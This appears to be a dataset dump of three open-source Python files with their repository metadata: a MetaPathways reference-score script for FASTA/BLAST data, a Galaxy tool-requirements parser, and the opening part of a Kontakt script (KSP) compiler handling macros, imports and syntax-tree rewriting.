def __next__(self):
if self.stop:
raise StopIteration
try:
if not self.name:
self.name = self.file.readline().strip()
line = self.file.readline()
except:
line = None
if not line:
self.stop = True
raise StopIteration
fragments = []
while line and not self.START_PATTERN.search(line):
fragments.append(line.strip())
line = self.file.readline()
# print line
if self.future_name:
self.name = re.sub('>','',self.future_name)
if line:
self.future_name = line.strip()
self.sequence =''.join(fragments)
self.seqname = self.name
return FastaRecord( re.sub('>', '', self.name), self.sequence)
def format_db_blast(formatdb_executable, seq_subset_file):
cmd='%s -dbtype prot -in %s' %(formatdb_executable, seq_subset_file.name)
result= getstatusoutput(cmd)
def format_db_last(formatdb_executable, seq_subset_file):
dirname = os.path.dirname(seq_subset_file.name)
cmd='%s -p -c %s %s' %(formatdb_executable, dirname + PATHDELIM + 'subset_db', seq_subset_file.name)
result= getstatusoutput(cmd)
def blast_against_itself(blast_executable, seq_subset_file, blast_table_out):
cmd='%s -outfmt 6 -db %s -query %s -out %s' %(blast_executable, seq_subset_file.name, seq_subset_file.name, blast_table_out)
result= getstatusoutput(cmd)
def last_against_itself(last_executable, seq_subset_file, last_table_out):
dirname = os.path.dirname(seq_subset_file.name)
cmd='%s -o %s -f 0 %s %s' %(last_executable, last_table_out, dirname + PATHDELIM + 'subset_db', seq_subset_file.name)
result= getstatusoutput(cmd)
def add_last_refscore_to_file(blast_table_out, refscore_file, allNames):
commentPATTERN = re.compile(r'^#')
infile = open( blast_table_out,'r')
refscores = {}
lines = infile.readlines()
for line in lines:
if commentPATTERN.match(line):
continue
line=line.rstrip()
fields = line.split('\t')
if len(fields) != 12:
print('Error in the blastout file')
sys.exit(1)
if fields[6].rstrip()==fields[1].rstrip():
# fprintf(refscore_file, "%s\t%s\n",fields[0], fields[11])
refscores[fields[1]]=fields[0]
for key, value in refscores.items():
allNames[key] = True
fprintf(refscore_file, "%s\t%s\n",key, value)
infile.close()
def add_blast_refscore_to_file(blast_table_out, refscore_file, allNames):
infile = open( blast_table_out,'r')
refscores = {}
lines = infile.readlines()
for line in lines:
line=line.rstrip()
fields = line.split('\t')
if len(fields) != 12:
print('Error in the blastout file')
sys.exit(1)
if fields[0].rstrip()==fields[1].rstrip():
# fprintf(refscore_file, "%s\t%s\n",fields[0], fields[11])
refscores[fields[0]]=fields[11]
for key, value in refscores.items():
allNames[key] = True
fprintf(refscore_file, "%s\t%s\n",key, value)
infile.close()
# write the refscores
def write_refscores(refscore_file, refscores, compact_output=False):
for key, value in refscores.items():
orfid = key
if compact_output:
orfid = ShortenORFId(key)
fprintf(refscore_file, "%s\t%s\n",orfid, value)
SCORES= {
'A': 4,
'R': 5,
'N': 6,
'D': 6,
'C': 9,
'Q': 5,
'E': 5,
'G': 6,
'H': 8,
'I': 4,
'L': 4,
'K': 5,
'M': 5,
'F': 6,
'P': 7 ,
'S': 4 ,
'T': 5 ,
'W': 11,
'Y': 7 ,
'V': 4,
'B': 4,
'J': 3,
'Z': 4,
'X': -1,
'*': 1,
}
def getrefscore(seq):
score =0
for c in seq:
try:
score += SCORES[c]
except:
score = 0
return score
def compute_refscores(sequences_subset, refscore_file, compact_output=False):
refscores ={}
for key, value in sequences_subset.items():
refscores[key] = getrefscore(value)
write_refscores(refscore_file, refscores, compact_output=compact_output)
def add_blast_refscore_to_file(blast_table_out, refscore_file, allNames):
infile = open( blast_table_out,'r')
refscores = {}
lines = infile.readlines()
for line in lines:
line=line.rstrip()
fields = line.split('\t')
if len(fields) != 12:
print('Error in the blastout file')
sys.exit(1)
if fields[0].rstrip()==fields[1].rstrip():
# fprintf(refscore_file, "%s\t%s\n",fields[0], fields[11])
refscores[fields[0]]=fields[11]
for key, value in refscores.items():
allNames[key] = True
fprintf(refscore_file, "%s\t%s\n",key, value)
infile.close()
# compute the refscores
def _old_compute_refscores(formatdb_executable, blast_executable,seq_subset_file, refscore_file, allNames, algorithm):
if algorithm =='LAST':
format_db_last(formatdb_executable, seq_subset_file)
last_table_out = seq_subset_file.name + ".lastout"
last_against_itself(blast_executable, seq_subset_file, last_table_out)
add_last_refscore_to_file(last_table_out,refscore_file, allNames)
if algorithm =='BLAST':
format_db_blast(formatdb_executable, seq_subset_file)
blast_table_out = seq_subset_file.name + ".blastout"
blast_against_itself(blast_executable, seq_subset_file, blast_table_out)
add_blast_refscore_to_file(blast_table_out,refscore_file, allNames)
return None
def remove_blast_index_files(filename):
prefixes = [ 'blastout', 'phr', 'pin', 'psq' ]
for prefix in prefixes:
try:
remove(filename +"." + prefix)
except IOError:
pass
def remove_last_index_files(filename):
suffixes = [ 'prj', 'des', 'sds', 'suf', 'bck', 'ssp', 'tis' ]
remove( filename+ '.lastout')
dirname = os.path.dirname(filename)
for suffix in suffixes:
try:
remove(dirname + PATHDELIM + 'subset_db.' + suffix)
except IOError:
pass
# the main function
SIZE = 10000
def main(argv, errorlogger = None, runstatslogger = None):
global parser
(opts, args) = parser.parse_args(argv)
if check_arguments(opts, args):
print(usage)
sys.exit(0)
input_fasta = opts.input_fasta
output_file = opts.output_file
algorithm = opts.algorithm
compact_output= opts.compact_output
# input file to blast with itself to commpute refscore
#this file has the refscores of the entire file
outfile = open(output_file + ".tmp", 'w')
count = 0
allNames= dict()
sequence_subset = dict()
refscores = dict()
fastaReader = FastaReader(input_fasta)
for record in fastaReader:
count = count + 1
sequence_subset[record.name] = record.sequence
if count % SIZE == 0:
compute_refscores(sequence_subset, outfile, compact_output=compact_output)
count = 0
sequence_subset = dict()
if count % SIZE != 0:
compute_refscores(sequence_subset, outfile, compact_output=compact_output)
sequence_subset = dict()
#print count
fastaReader.close()
outfile.close()
rename(output_file + ".tmp", output_file)
def MetaPathways_refscore(argv, errorlogger = None, runstatslogger = None):
createParser( )
if errorlogger:
errorlogger.write("#STEP\tCOMPUTE_REFSCORE\n")
try:
main(argv, errorlogger = errorlogger, runstatslogger = runstatslogger)
except:
insert_error(15)
return (0,traceback.format_exc(10))
return (0,'')
# the main function of metapaths
if __name__ == "__main__":
createParser()
main(sys.argv[1:])
|
kishori82/MetaPathways_Python.3.0
|
libs/python_scripts/MetaPathways_refscore.py
|
Python
|
mit
| 11,218
|
[
"BLAST"
] |
8010793efbf5f852a9b1e82df941ea2b5c4fbe9a85bc61cef8a343be67ce312b
|
from galaxy.util import xml_text
DEFAULT_REQUIREMENT_TYPE = "package"
DEFAULT_REQUIREMENT_VERSION = None
class ToolRequirement( object ):
"""
Represents an external requirement that must be available for the tool to
run (for example, a program, package, or library). Requirements can
optionally assert a specific version.
"""
def __init__( self, name=None, type=None, version=None ):
self.name = name
self.type = type
self.version = version
def to_dict( self ):
return dict(name=self.name, type=self.type, version=self.version)
@staticmethod
def from_dict( dict ):
version = dict.get( "version", None )
name = dict.get("name", None)
type = dict.get("type", None)
return ToolRequirement( name=name, type=type, version=version )
DEFAULT_CONTAINER_TYPE = "docker"
class ContainerDescription( object ):
def __init__( self, identifier=None, type="docker" ):
self.identifier = identifier
self.type = type
def to_dict( self ):
return dict(identifier=self.identifier, type=self.type)
@staticmethod
def from_dict( dict ):
identifier = dict["identifier"]
type = dict.get("type", DEFAULT_CONTAINER_TYPE)
return ContainerDescription( identifier=identifier, type=type )
def parse_requirements_from_dict( root_dict ):
requirements = root_dict.get("requirements", [])
containers = root_dict.get("containers", [])
return map(ToolRequirement.from_dict, requirements), map(ContainerDescription.from_dict, containers)
def parse_requirements_from_xml( xml_root ):
"""
>>> from xml.etree import ElementTree
>>> def load_requirements( contents ):
... contents_document = '''<tool><requirements>%s</requirements></tool>'''
... root = ElementTree.fromstring( contents_document % contents )
... return parse_requirements_from_xml( root )
>>> reqs, containers = load_requirements('''<requirement>bwa</requirement>''')
>>> reqs[0].name
'bwa'
>>> reqs[0].version is None
True
>>> reqs[0].type
'package'
>>> reqs, containers = load_requirements('''<requirement type="binary" version="1.3.3">cufflinks</requirement>''')
>>> reqs[0].name
'cufflinks'
>>> reqs[0].version
'1.3.3'
>>> reqs[0].type
'binary'
"""
requirements_elem = xml_root.find( "requirements" )
requirement_elems = []
if requirements_elem is not None:
requirement_elems = requirements_elem.findall( 'requirement' )
requirements = []
for requirement_elem in requirement_elems:
name = xml_text( requirement_elem )
type = requirement_elem.get( "type", DEFAULT_REQUIREMENT_TYPE )
version = requirement_elem.get( "version", DEFAULT_REQUIREMENT_VERSION )
requirement = ToolRequirement( name=name, type=type, version=version )
requirements.append( requirement )
container_elems = []
if requirements_elem is not None:
container_elems = requirements_elem.findall( 'container' )
containers = []
for container_elem in container_elems:
identifier = xml_text( container_elem )
type = container_elem.get( "type", DEFAULT_CONTAINER_TYPE )
container = ContainerDescription( identifier=identifier, type=type )
containers.append( container )
return requirements, containers
|
ssorgatem/pulsar
|
galaxy/tools/deps/requirements.py
|
Python
|
apache-2.0
| 3,413
|
[
"BWA",
"Galaxy"
] |
020de31c8c31142d12ec6e5e14201b947c3d55213a647d7efa07a7ece5b88b71
|
# ksp-compiler - a compiler for the Kontakt script language
# Copyright (C) 2011 Nils Liberg
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version:
# http://www.gnu.org/licenses/gpl-2.0.html
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import re
import os
import copy
import collections
from collections import OrderedDict
import ksp_ast
import ksp_ast_processing
from ksp_compiler_extras import flatten
import ksp_compiler_extras as comp_extras
import ksp_builtins
from ksp_parser import parse
from taskfunc import taskfunc_code
from collections import OrderedDict
import hashlib
import ply.lex as lex
# NOTE(Sam): include preprocessor and logger
from logger import logger_code
import time
from preprocessor_plugins import pre_macro_functions, macro_iter_functions, post_macro_functions
import json
import copy
variable_prefixes = '$%@!?~'
# regular expressions:
white_space = r'(?ms)(\s*(\{[^\n]*?\})?\s*)' # regexp for normal white space/comments
comment_re = re.compile(r'(?<!["\'])\{.*?\}|\(\*.*?\*\)|/\*.*?\*/', re.DOTALL) # if { is preceeded by ' or " don't treat it as a comment
string_re = re.compile(r'".*?(?<!\\)"|' + r"'.*?(?<!\\)'")
line_continuation_re = re.compile(r'\.\.\.\s*\n', re.MULTILINE)
placeholder_re = re.compile(r'\[\[\[\d+\]\]\]')
varname_re = re.compile(r'((\b|[$%!@~?])[0-9]*[a-zA-Z_][a-zA-Z0-9_]*(\.[a-zA-Z_0-9]+)*)\b')
varname_dot_re = re.compile(r'(?<![$%!@~?])\b[0-9]*[a-zA-Z_][a-zA-Z0-9_]*?\.')
import_basic_re = re.compile(r'^\s*import ')
import_re = re.compile(r'^\s*import\s+"(?P<filename>.+?)"(\s+as\s(?P<asname>[a-zA-Z_][a-zA-Z0-9_.]*))?%s$' % white_space)
macro_start_re = re.compile(r'^\s*macro(?=\W)')
macro_end_re = re.compile(r'^\s*end\s+macro')
line_continuation_re = re.compile(r'\.\.\.\s*\n', re.MULTILINE)
placeholders = {} # mapping from placeholder number to contents (placeholders used for comments, strings and ...)
functions = OrderedDict() # maps from function name to AST node corresponding to the function definition
variables = set() # a set of the names of the declared variables (prefixed with $, %, !, ? or @)
ui_variables = set() # a set of the names of the declared variables of UI type, like ui_knob, ui_value_edit, etc. (prefixed with $, %, !, ? or @)
families = set() # a set of the family names (prefixed with namespaces)
properties = set()
functions_invoking_wait = set()
true_conditions = set() # the conditions set using SET_CONDITION
called_functions = set() # functions that are somewhere in the script invoked using the Kontakt 4.1 "call" keyword
call_graph = collections.defaultdict(list) # an item (a, b) is included if function a invokes function b using the "call" keyword
def init_globals():
variables.clear()
ui_variables.clear()
functions.clear()
placeholders.clear()
families.clear()
properties.clear()
functions_invoking_wait.clear()
true_conditions.clear()
called_functions.clear()
call_graph.clear()
# simple class to work-around the problem that cStringIO cannot handle certain unicode input
class StringIO:
def __init__(self):
self.parts = []
def write(self, s):
self.parts.append(s)
def getvalue(self):
return ''.join(self.parts)
def prefix_with_ns(name, namespaces, function_parameter_names=None, force_prefixing=False):
if not namespaces:
return name
function_parameter_names = function_parameter_names or []
##name = name.replace('.', '__') # replace . by __
if name[0] in variable_prefixes:
prefix, unprefixed_name = name[0], name[1:]
else:
prefix, unprefixed_name = '', name
# if the name consists of multiple parts (eg. myfamily.myvariable extract the first part - myfamily in this example)
first_name_part = name.split('.')[0]
# if built-in name or function parameter
if (unprefixed_name in ksp_builtins.variables_unprefixed or
name in ksp_builtins.functions or
name in ksp_builtins.keywords or
first_name_part in function_parameter_names) and not force_prefixing:
return name # don't add prefix
# add namespace to name
return prefix + '.'.join(namespaces + [unprefixed_name])
def prefix_ID_with_ns(id, namespaces, function_parameter_names=None, force_prefixing=False):
if namespaces:
return ksp_ast.ID(id.lexinfo, identifier=prefix_with_ns(str(id), namespaces, function_parameter_names, force_prefixing))
else:
return id
def split_args(arg_string, line):
""" converts eg. "x, y*(1+z), z" into a list ['x', 'y*(1+z)', 'z'] """
if arg_string.strip() == '':
return []
args = []
cur_arg = ''
unmatched_left_paren = 0
double_quote_on = False
for idx, ch in enumerate(arg_string + ','): # extra ',' to include the last argument
# square brackets are also checked as there may be commas in them (for properties/2D arrays)
if ch is '\"' and (idx == 0 or arg_string[idx - 1] is not '\\'):
double_quote_on = not double_quote_on
elif ch in ['(', '[']:
unmatched_left_paren += 1
elif ch in [')', ']']:
unmatched_left_paren -= 1
if ch == ',' and unmatched_left_paren == 0 and not double_quote_on:
cur_arg = cur_arg.strip()
if not cur_arg:
raise ParseException(line, 'Syntax error - empty argument in function call: %s' % arg_string)
args.append(cur_arg)
cur_arg = ''
else:
cur_arg += ch
if unmatched_left_paren:
raise ParseException(line, 'Error - unmatched parenthesis in function call: %s' % arg_string)
return args
class ExceptionWithMessage(Exception):
_message = None
def _get_message(self):
return self._message
def _set_message(self, value):
self._message = value
message = property(_get_message, _set_message)
class ParseException(ExceptionWithMessage):
def __init__(self, line, message):
assert(isinstance(line, Line))
msg = "%s\n%s\n\n%s" % (message, str(line).strip(), line.get_locations_string())
Exception.__init__(self, msg)
self.line = line
self.message = msg
class Line:
def __init__(self, s, locations=None, namespaces=None):
# locations should be a list of (filename, lineno) tuples
self.command = s
self.locations = locations or [(None, -1)]
self.namespaces = namespaces or [] # a list of the namespaces (each import appends the as-name onto the stack)
def get_lineno(self):
return self.locations[0][1]
lineno = property(get_lineno)
def get_filename(self):
return self.locations[0][0]
filename = property(get_filename)
def get_locations_string(self):
return '\n'.join(
('%s%s:%d \r\n' % (' ' * (i * 4), filename or '<main script>', lineno)) for (i, (filename, lineno)) in enumerate(reversed(self.locations)))
def copy(self, new_command=None, add_location=None):
""" returns a copy of the line.
If the new_command parameter is specified that will be the command of the new line
and it will get the same indentation as the old line. """
line = Line(self.command, self.locations, self.namespaces)
if add_location:
line.locations = line.locations + [add_location]
if new_command:
line.command = new_command
return line
def substitute_names(self, name_subst_dict):
if not name_subst_dict:
return self
def repl_func(match):
n = match.group(0)
if n.endswith('.'):
suffix = '.'
n = n[:-1]
else:
suffix = ''
if n in name_subst_dict:
return name_subst_dict[n] + suffix
else:
return n + suffix
s = varname_re.sub(repl_func, self.command)
s = varname_dot_re.sub(repl_func, s)
return self.copy(new_command=s)
def replace_placeholders(self):
replace_func = lambda matchobj: placeholders[int(matchobj.group(1))]
self.command = re.sub(r'\{(\d+?)\}', replace_func, self.command)
def __str__(self):
return self.command
def __repr__(self):
return self.command
class Macro:
def __init__(self, lines):
self.lines = lines
self.name, self.parameters = self.get_macro_name_and_parameters()
def get_name_prefixed_by_namespace(self):
return prefix_with_ns(self.name, self.lines[0].namespaces)
def get_macro_name_and_parameters(self):
""" returns the function name, parameter list, and result variable (or None) as a tuple """
param = white_space + r'([$%@!?~]?[\w\.]+|#[\w\.]+#)' + white_space
params = r'%s(,%s)*' % (param, param)
m = re.match(r'^\s*macro\s+(?P<name>[a-zA-Z0-9_]+(\.[a-zA-Z_0-9.]+)*)\s*(?P<params>\(%s\))?' % params, self.lines[0].command)
if not m:
raise ParseException(self.lines[0], "Syntax error in macro declaration")
name = m.group('name')
params = m.group('params') or []
if params:
params = params[1:-1] # strip parenthesis
params = re.sub(white_space, '', params) # strip whitespace (eg. comments)
params = [x.strip() for x in params.split(',')]
return (name, params)
def copy(self, lines=None, add_location=None):
if lines is None:
lines = self.lines[:]
return Macro([l.copy(add_location=add_location) for l in lines])
def substitute_names(self, name_subst_dict):
""" returns a copy of the block with the specified name substitutions made """
new_macro = self.copy(lines=[line.substitute_names(name_subst_dict) for line in self.lines])
for line in new_macro.lines:
line.replace_placeholders()
# handle raw replacements (arguments like #var# should be substituted irrespectively of context)
for name1, name2 in list(name_subst_dict.items()):
if name1.startswith('#'):
for line in new_macro.lines:
line.command = line.command.replace(name1, name2)
return new_macro
def merge_lines(lines):
""" converts a list of Line objects to a source code string """
return '\n'.join([line.command for line in lines])
def parse_lines(s, filename=None, namespaces=None):
""" converts a source code string to a list of Line objects """
if namespaces is None:
namespaces = []
def replace_func(match):
# replace the match with a placeholder (eg. "{8}") and store the replaced string
i = len(placeholders)
s = match.group(0)
s = placeholder_re.sub('', s) # strip encoded line numbers (for multiline comments)
if s and s[0] == "'": # convert single quotes (') to double quotes (")
s = '"%s"' % s[1:-1].replace(r"\'", "'")
placeholders[i] = s
return '{%d}' % i
lines = s.replace('\r\n', '\n').replace('\r', '\n').split('\n')
# encode lines numbers as '[[[lineno]]]' at the beginning of each line
lines = ['[[[%.5d]]]%s' % (lineno+1, x) for (lineno, x) in enumerate(lines)]
s = '\n'.join(lines)
# remove comments and multi-line indicators ('...\n')
s = comment_re.sub('', s)
lines = s.split('\n')
# NOTE(Sam): Remove any occurances of the new comment type //
for i in range(len(lines)):
m = re.search(r"^(?:(?!\/\/|[\"\']).|[\"\'][^\"\']*[\"\'])*(\/\/.*$)", lines[i])
if m:
lines[i] = lines[i].replace(m.group(1), "")
s = '\n'.join(lines)
s = line_continuation_re.sub('', s)
# substitute strings with place-holders
s = string_re.sub(replace_func, s)
# construct Line objects by extracting the line number and line parts
lines = []
for line in s.split('\n'):
lineno, line = int(line[3:3+5]), line[3+5+3:]
line = placeholder_re.sub('', line)
lines.append(Line(line, [(filename, lineno)], namespaces))
return collections.deque(lines)
def parse_lines_and_handle_imports(code, filename=None, namespaces=None, read_file_function=None, preprocessor_func=None):
""" reads one block from the lines deque """
if preprocessor_func:
code = preprocessor_func(code, namespaces)
lines = parse_lines(code, filename, namespaces)
new_lines = collections.deque()
while lines:
line = lines.popleft()
# if line seems to be an import line
if import_basic_re.match(line.command):
line.replace_placeholders()
# check if it matches a more elaborate syntax
m = import_re.match(str(line))
if not m:
raise ParseException(line, "Syntax error in import statement.")
# load the code in the given file
filename = m.group('filename')
namespace = m.group('asname')
try:
code = read_file_function(filename)
except IOError:
raise ParseException(line, "File does not exist or could not be read: '%s' \n(try saving the files before compiling to get relative search paths right)." % filename)
# parse code and add an extra namespace if applicable
namespaces = line.namespaces
if namespace:
namespaces = namespaces + [namespace]
if preprocessor_func:
code = preprocessor_func(code, namespaces)
new_lines.extend(parse_lines_and_handle_imports(code, filename, namespaces, read_file_function))
# non-import line so just add it to result line list:
else:
new_lines.append(line)
return new_lines
def handle_conditional_lines(lines):
''' handle SET_CONDITION, RESET_CONDITION, USE_CODE_IF and USE_CODE_IF_NOT '''
use_code_conds = []
false_index = -1
for line_obj in lines:
line = line_obj.command
ls_line = line.lstrip()
clear_this_line = false_index + 1
if 'END_USE_CODE' in line:
if use_code_conds.pop() == False and len(use_code_conds) == false_index:
false_index = -1
clear_this_line = True
if not clear_this_line and 'SET_CONDITION(' in line:
m = re.search('\((.+?)\)', line)
if m:
cond = m.group(1).strip()
if line.lstrip().startswith('SET_CONDITION('):
true_conditions.add(cond)
if not cond.startswith('NO_SYS'): # if it starts with NO_SYS, then leave it in the code
clear_this_line = True
elif line.lstrip().startswith('RESET_CONDITION('):
if cond in true_conditions:
true_conditions.remove(cond)
if not cond.startswith('NO_SYS'): # if it starts with NO_SYS, then leave it in the code
clear_this_line = True
if 'USE_CODE_IF' in line:
m = re.search('\((.+?)\)', line)
if m:
cond = m.group(1).strip()
if line.lstrip().startswith('USE_CODE_IF('):
if false_index == -1 and cond not in true_conditions:
false_index = len(use_code_conds)
use_code_conds.append(cond in true_conditions)
clear_this_line = True
elif line.lstrip().startswith('USE_CODE_IF_NOT('):
if false_index == -1 and cond in true_conditions:
false_index = len(use_code_conds)
use_code_conds.append(cond not in true_conditions)
clear_this_line = True
if clear_this_line:
line_obj.command = re.sub(r'[^\r\n]', '', line)
def extract_macros(lines_deque):
''' returns (cleaned_lines, macros) '''
macros = []
lines = lines_deque
cleaned_lines = []
while lines:
line = lines.popleft()
# if macro definition found, read lines up until the next "end macro"
if macro_start_re.match(line.command):
found_end = False
macro_lines = [line]
while lines:
line = lines.popleft()
macro_lines.append(line)
if macro_end_re.match(line.command):
found_end = True
break
if macro_start_re.match(line.command):
raise ParseException(line, "Macro definitions may not be nested (maybe you forgot an 'end macro' line earlier).")
if not found_end:
raise ParseException(macro_lines[0], "Did not find a corresponding 'end macro'.")
macros.append(Macro(macro_lines))
# else if line outside of macro definition
else:
cleaned_lines.append(line)
return (cleaned_lines, macros)
def extract_callback_lines(lines):
''' returns (normal_lines, callback_lines) '''
normal_lines = []
callback_lines = []
inside_callback = False
for line in lines:
if re.match(r'\s*on\s+(ui_control) *\(', line.command):
inside_callback = True
callback_lines.append(line)
elif re.match(r'\s*end on\b', line.command):
inside_callback = False
callback_lines.append(line)
else:
# are we currently inside a callback or not?
if inside_callback:
callback_lines.append(line)
else:
normal_lines.append(line)
return (normal_lines, callback_lines)
def expand_macros(lines, macros, level=0):
''' inline macro invocations by the body of the macro definition (with parameters properly replaced)
returns tuple (normal_lines, callback_lines) where the latter are callbacks'''
macro_call_re = re.compile(r'^\s*([\w_.]+)\s*(\(.*\))?%s$' % white_space)
name2macro = {}
for m in macros:
name = m.get_name_prefixed_by_namespace()
if not (name == 'tcm.init' and name in name2macro):
name2macro[name] = m
#name2macro = dict([(m.get_name_prefixed_by_namespace(), m) for m in macros])
orig_lines = lines
lines = collections.deque(orig_lines)
new_lines = []
new_callback_lines = []
num_substitutions = 0
while lines:
line = lines.popleft()
new_lines.append(line)
m = macro_call_re.match(line.command)
if m:
macro_name, args = m.group(1), m.group(2)
macro_name = prefix_with_ns(macro_name, line.namespaces)
if macro_name in name2macro:
new_lines.pop()
macro = name2macro[macro_name]
if args:
args = split_args(args[1:-1], line)
else:
args = []
# verify that the parameter count is correct
if len(macro.parameters) != len(args):
raise ParseException(line, "Wrong number of parameters. Expected %d, got %d." % (len(macro.parameters), len(args)))
if level > 40:
raise ParseException(line, "This macro seems to be invoking itself recursively")
# build a substitution mapping parameters to arguments, and substitute
name_subst_dict = dict(list(zip(macro.parameters, args)))
macro = macro.copy(add_location=line.locations[0])
macro = macro.substitute_names(name_subst_dict)
# add macro body
if args:
macro_call_str = '%s(%s)' % (macro_name, ', '.join([re.sub(white_space, '', a).strip() for a in args]))
else:
macro_call_str = '%s' % (macro_name)
macro_call_str = re.sub(white_space, '', macro_call_str) # erase any inner comments to not disturb outer
normal_lines, callback_lines = extract_callback_lines(macro.lines[1:-1])
new_lines.extend(normal_lines)
new_callback_lines.extend(callback_lines)
num_substitutions += 1
if num_substitutions:
return expand_macros(new_lines + new_callback_lines, macros, level+1)
else:
return (new_lines, new_callback_lines)
class ASTModifierBase(ksp_ast_processing.ASTModifier):
def __init__(self, modify_expressions=False):
ksp_ast_processing.ASTModifier.__init__(self, modify_expressions=modify_expressions)
def modifyFunctionCall(self, node, *args, **kwargs):
# there are some functions/preprocessor directives for which the first parameter should always be left as is
if node.function_name.identifier in ['SET_CONDITION', 'RESET_CONDITION', 'USE_CODE_IF', 'USE_CODE_IF_NOT',
'_pgs_create_key', '_pgs_key_exists', '_pgs_set_key_val', '_pgs_get_key_val',
'pgs_create_key', 'pgs_key_exists', 'pgs_set_key_val', 'pgs_get_key_val',
'pgs_create_str_key', 'pgs_str_key_exists', 'pgs_set_str_key_val', 'pgs_get_str_key_val']:
first_parameter_to_change = 1 # exclude the first parameter
else:
first_parameter_to_change = 0
node.function_name = self.modify(node.function_name, *args, **kwargs)
node.parameters[first_parameter_to_change:] = [self.modify(p, *args, **kwargs)
for p in node.parameters[first_parameter_to_change:]]
if node.is_procedure:
return [node]
else:
return node
class ASTModifierFixReferencesAndFamilies(ASTModifierBase):
def __init__(self, ast, line_map):
ASTModifierBase.__init__(self, modify_expressions=True)
self.line_map = line_map
self.traverse(ast, parent_function=None, function_params=[], parent_families=[])
def modifyModule(self, node, *args, **kwargs):
# find and extract 'on init' block
on_init_block = None
for b in node.blocks:
if isinstance(b, ksp_ast.Callback) and b.name == 'init':
node.blocks.remove(b)
on_init_block = b
break
# if there was none, create one
if on_init_block is None:
on_init_block = ksp_ast.Callback(node.lexinfo, 'init', lines=[])
node.on_init = on_init_block
# insert it as the first block
node.blocks.insert(0, on_init_block)
ASTModifierBase.modifyModule(self, node, *args, **kwargs)
# in case some function definition has been overriden, keep only the version among functions.value()
node.blocks = [b for b in node.blocks if not (isinstance(b, ksp_ast.FunctionDef) and functions[b.name.identifier] != b)]
return node
def modifyForStmt(self, node, *args, **kwargs):
''' Convert for-loops into while-loops '''
if node.downto:
op = '>='
incdec = 'dec'
else:
op = '<='
incdec = 'inc'
# optimize "for x := 0 to N-1" into "while x < N" instead of the normal "while x <= N-1"
if not node.downto and isinstance(node.end, ksp_ast.BinOp) and node.end.op == '-' and isinstance(node.end.right, ksp_ast.Integer) and node.end.right.value == 1:
op = '<'
node.end = node.end.left # skip the -1 part (keep only the left operand)
loop_condition = ksp_ast.BinOp(node.lexinfo, node.loopvar.copy(), op, node.end)
# if a step is specified then the increment is formulated as x := x + step
if node.step:
incdec_op = {'inc': '+',
'dec': '-'}[incdec]
incdec_statement = ksp_ast.AssignStmt(node.lexinfo, node.loopvar.copy(), ksp_ast.BinOp(node.lexinfo, node.loopvar.copy(), incdec_op, node.step))
# otherwise we use inc(x) or dec(x)
else:
incdec_statement = ksp_ast.FunctionCall(node.lexinfo, ksp_ast.ID(node.lexinfo, incdec), [node.loopvar.copy()], is_procedure=True)
statements = [ksp_ast.AssignStmt(node.lexinfo, node.loopvar.copy(), node.start),
ksp_ast.WhileStmt(node.lexinfo, loop_condition,
node.statements + [incdec_statement])]
return flatten([self.modify(stmt, *args, **kwargs) for stmt in statements])
def modifyIfStmt(self, node, *args, **kwargs):
''' Convert if-else if-else statements into just if-else statements by nesting them inside each other '''
# modify the if condition and the statements in the if-body
if_condition, stmts = node.condition_stmts_tuples[0]
if_condition, stmts = (self.modify(if_condition, *args, **kwargs),
flatten([self.modify(s, *args, **kwargs) for s in stmts]))
node.condition_stmts_tuples[0] = (if_condition, stmts)
# if if-else statement (i.e. no else-if part)
if len(node.condition_stmts_tuples) == 2 and node.condition_stmts_tuples[1][0] is None:
stmts = node.condition_stmts_tuples[1][1]
stmts = flatten([self.modify(s, *args, **kwargs) for s in stmts])
node.condition_stmts_tuples[1] = (None, stmts)
# else if there is any "else if" part
elif len(node.condition_stmts_tuples) > 1 and node.condition_stmts_tuples[1][0] is not None:
else_if_condition, else_if_stmts = node.condition_stmts_tuples[1]
# create a new if-statement consisting of the that 'else if' and all the following 'else if'/'else' clauses, and modify this recursively
new_if_stmt = self.modifyIfStmt(ksp_ast.IfStmt(node.condition_stmts_tuples[1][0].lexinfo, node.condition_stmts_tuples[1:]), *args, **kwargs)[0]
# the new contents of the else part will be the if-statement just created
node.condition_stmts_tuples = [node.condition_stmts_tuples[0],
(None, [new_if_stmt])]
return [node]
def modifyPropertyDef(self, node, *args, **kwargs):
# check syntax
for func_name in list(node.functiondefs.keys()):
if func_name not in ['get', 'set']:
raise ksp_ast.ParseException(node.functiondefs[func_name], "Expected function with name 'get' or 'set' but found '%s'" % func_name)
if not node.get_func_def and not node.set_func_def:
raise ksp_ast.ParseException(node, "Expected function with name 'get' or 'set' but found no function definition.")
if node.get_func_def and not node.get_func_def.return_value:
raise ksp_ast.ParseException(node.get_func_def, "The 'get' function needs to have a return value.")
if node.set_func_def and node.set_func_def.return_value:
raise ksp_ast.ParseException(node.set_func_def, "The 'set' function must not have a return value.")
if node.set_func_def and not node.set_func_def.parameters:
raise ksp_ast.ParseException(node.set_func_def, "The 'set' function must have at least one parameter.")
# prefix the name
if kwargs['parent_families']:
node.name = prefix_ID_with_ns(node.name, kwargs['parent_families'], kwargs['function_params'], force_prefixing=True)
else:
node.name = self.modifyID(node.name, kwargs['parent_function'], kwargs['parent_families'])
# change the get/set function names before proceeding to them
if node.get_func_def:
node.get_func_def.name.identifier = node.name.identifier + '.get' # if property is call prop, then this function is named prop.get
node.get_func_def = self.modify(node.get_func_def, parent_function=None, function_params=[], parent_families=[], add_name_prefix=False)
if node.set_func_def:
node.set_func_def.name.identifier = node.name.identifier + '.set' # if property is call prop, then this function is named prop.set
node.set_func_def = self.modify(node.set_func_def, parent_function=None, function_params=[], parent_families=[], add_name_prefix=False)
# add property to list
properties.add(node.name.identifier)
return []
def modifyFunctionDef(self, node, parent_function=None, function_params=None, parent_families=None, add_name_prefix=True):
''' Pass along som context information (eg. what function definition we're inside and what parameters it has)
Also initialize some member variables on the function object that will be modified inside its body (eg. local variable declarations) '''
node.local_declaration_statements = []
node.global_declaration_statements = []
node.taskfunc_declaration_statements = []
node.locals_name_subst_dict = {} # maps local variable names to their global counterpart
node.locals = set() # a set containing the keys in node.locals_name_subst_dict, but all in lower-case
node.used = False
# as we visit the function definition, pass along information to nodes further down the tree of the function parameter names
params = function_params + node.parameters
if node.return_value:
params.append(node.return_value.identifier)
# modify name first (add namespace prefix)
